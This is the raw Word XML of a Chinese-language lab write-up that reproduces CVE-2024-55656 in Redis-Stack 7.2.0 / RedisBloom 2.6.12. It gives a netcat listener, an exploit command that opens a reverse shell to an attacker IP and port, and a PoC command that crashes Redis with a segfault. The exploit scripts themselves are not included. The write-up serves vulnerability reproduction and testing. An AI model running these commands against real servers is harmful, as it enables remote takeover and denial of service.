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00EFB681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A6580F" w:rsidRPr="00A6580F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Redis-Stack-7.2.0-v10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，打开命令行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15217A30" w14:textId="37020376" w:rsidR="00DA0DBA" w:rsidRDefault="00A6580F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4174888" w:rsidR="00EA3792" w:rsidRDefault="00A6580F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1D871363" w:rsidR="00314FC1" w:rsidRDefault="00A6580F" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00314FC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A6580F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RedisBloom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00314FC1" w:rsidRPr="00314FC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本为</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6580F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.6.12</w:t>
      </w:r>
      <w:r w:rsidR="00314FC1"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33E2D5DC" w:rsidR="00515443" w:rsidRPr="00EA3792" w:rsidRDefault="00A6580F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B4D6555" wp14:editId="743AA9B3">
            <wp:extent cx="5274310" cy="1010285"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="193730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7166EFD9" w14:textId="76C409BF" w:rsidR="00A6580F" w:rsidRPr="00A6580F" w:rsidRDefault="00A6580F" w:rsidP="00A6580F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6580F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150C50EB" w14:textId="77777777" w:rsidR="00A6580F" w:rsidRDefault="00A6580F" w:rsidP="00A6580F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1. 开启监听 4444 端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9B3D3A" w14:textId="5ABC8767" w:rsidR="00A6580F" w:rsidRPr="00A6580F" w:rsidRDefault="00A6580F" w:rsidP="00A6580F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6580F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A6580F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A6580F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A6580F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A6580F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D88A273" w14:textId="77777777" w:rsidR="00A6580F" w:rsidRDefault="00A6580F" w:rsidP="00A6580F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2. 进入 EXP 文件夹，运行 CVE-2024-55656-EXP.py 文件，输入目标机 Redis 的 IP 和端口，以及反弹 shell 的攻击机 IP 和端口。运行后可以看到成功反弹了 shell。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFFA7DA" w14:textId="77777777" w:rsidR="00A6580F" w:rsidRPr="00A6580F" w:rsidRDefault="00A6580F" w:rsidP="00A6580F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6580F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>python CVE-2024-55656-EXP.py --host 127.0.0.1 --port 6379 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A6580F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A6580F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.233.153 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A6580F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A6580F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EE8DDD" w14:textId="0DD9D129" w:rsidR="00A6580F" w:rsidRDefault="00A6580F" w:rsidP="00A6580F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FE4EB44" wp14:editId="6979A083">
            <wp:extent cx="5274310" cy="2421890"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1438805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AB89" w14:textId="5123D435" w:rsidR="00A6580F" w:rsidRPr="00A6580F" w:rsidRDefault="00A6580F" w:rsidP="00A6580F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6580F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DoS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1C7119" w14:textId="77777777" w:rsidR="00A6580F" w:rsidRDefault="00A6580F" w:rsidP="00A6580F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1. 进入 PoC 文件夹，运行 CVE-2024-55656-PoC.py 代码，输入目标机 Redis 的 IP 和端口，可以看到 Redis 断开了连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6314C4D3" w14:textId="77777777" w:rsidR="00A6580F" w:rsidRPr="00A6580F" w:rsidRDefault="00A6580F" w:rsidP="00A6580F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6580F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   python CVE-2024-55656-PoC.py --host 127.0.0.1 --port 6379</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8BB9DD" w14:textId="6B2CA5B2" w:rsidR="00A6580F" w:rsidRDefault="00A6580F" w:rsidP="00A6580F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6562312B" wp14:editId="18F1BC55">
            <wp:extent cx="5274310" cy="4107180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="1085731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FC31" w14:textId="77777777" w:rsidR="00A6580F" w:rsidRDefault="00A6580F" w:rsidP="00A6580F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2. 查看容器日志，可以看到 Redis 发生了段错误（signal: 11），导致崩溃。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692768B0" w14:textId="77777777" w:rsidR="00A6580F" w:rsidRPr="00A6580F" w:rsidRDefault="00A6580F" w:rsidP="00A6580F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6580F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   docker logs redis-stack-7.2.0-v10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B7FD95" w14:textId="3F48B43E" w:rsidR="00121977" w:rsidRPr="00357687" w:rsidRDefault="00A6580F" w:rsidP="00A6580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800186F" wp14:editId="26B0D8CB">
            <wp:extent cx="5274310" cy="2096770"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="18746375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977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8D990" w14:textId="77777777" w:rsidR="00240A83" w:rsidRDefault="00240A83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0A6C9C" w14:textId="77777777" w:rsidR="00240A83" w:rsidRDefault="00240A83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3B56" w14:textId="77777777" w:rsidR="00240A83" w:rsidRDefault="00240A83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DDCBF" w14:textId="77777777" w:rsidR="00240A83" w:rsidRDefault="00240A83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C2093"/>
    <w:rsid w:val="000D0CC9"/>
    <w:rsid w:val="00121977"/>
    <w:rsid w:val="001255A6"/>
    <w:rsid w:val="001A4CE8"/>
    <w:rsid w:val="001B45D2"/>
    <w:rsid w:val="001F470D"/>
    <w:rsid w:val="00240A83"/>
    <w:rsid w:val="00240A9B"/>
    <w:rsid w:val="002963CA"/>
    <w:rsid w:val="00314FC1"/>
    <w:rsid w:val="00347BA1"/>
    <w:rsid w:val="00353491"/>
    <w:rsid w:val="00357687"/>
    <w:rsid w:val="00365749"/>
    <w:rsid w:val="003C3C97"/>
    <w:rsid w:val="003E1DF5"/>
    <w:rsid w:val="004211EE"/>
    <w:rsid w:val="004574DB"/>
    <w:rsid w:val="004925F9"/>
    <w:rsid w:val="00494798"/>
    <w:rsid w:val="004A00AD"/>
    <w:rsid w:val="004D28F6"/>
    <w:rsid w:val="004D7523"/>
    <w:rsid w:val="004F22CA"/>
    <w:rsid w:val="00515385"/>
    <w:rsid w:val="00515443"/>
    <w:rsid w:val="00553595"/>
    <w:rsid w:val="0056410E"/>
    <w:rsid w:val="005D55C1"/>
    <w:rsid w:val="006056B4"/>
    <w:rsid w:val="00624195"/>
    <w:rsid w:val="006E7DDC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30ABD"/>
    <w:rsid w:val="00846AE6"/>
    <w:rsid w:val="00847DE1"/>
    <w:rsid w:val="00881BAE"/>
    <w:rsid w:val="00885BC3"/>
    <w:rsid w:val="008C5391"/>
    <w:rsid w:val="00952E7B"/>
    <w:rsid w:val="0095627D"/>
    <w:rsid w:val="00985906"/>
    <w:rsid w:val="00991288"/>
    <w:rsid w:val="009D5886"/>
    <w:rsid w:val="009F1BEC"/>
    <w:rsid w:val="00A34FE3"/>
    <w:rsid w:val="00A3789C"/>
    <w:rsid w:val="00A57DB4"/>
    <w:rsid w:val="00A6580F"/>
    <w:rsid w:val="00AA689B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A3DFD"/>
    <w:rsid w:val="00CC4579"/>
    <w:rsid w:val="00CD5E58"/>
    <w:rsid w:val="00CF5555"/>
    <w:rsid w:val="00D0413A"/>
    <w:rsid w:val="00D65E94"/>
    <w:rsid w:val="00D94BF6"/>
    <w:rsid w:val="00DA0DBA"/>
    <w:rsid w:val="00DA5642"/>
    <w:rsid w:val="00DE0246"/>
    <w:rsid w:val="00DF4450"/>
    <w:rsid w:val="00DF70D0"/>
    <w:rsid w:val="00E23BA3"/>
    <w:rsid w:val="00E3023D"/>
    <w:rsid w:val="00E735CD"/>
    <w:rsid w:val="00E76282"/>
    <w:rsid w:val="00EA3792"/>
    <w:rsid w:val="00ED16ED"/>
    <w:rsid w:val="00EE10BF"/>
    <w:rsid w:val="00EE1D2A"/>
    <w:rsid w:val="00F672D5"/>
    <w:rsid w:val="00F7106A"/>
    <w:rsid w:val="00F7437A"/>
    <w:rsid w:val="00FD0414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53</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-27T14:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-17T03:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>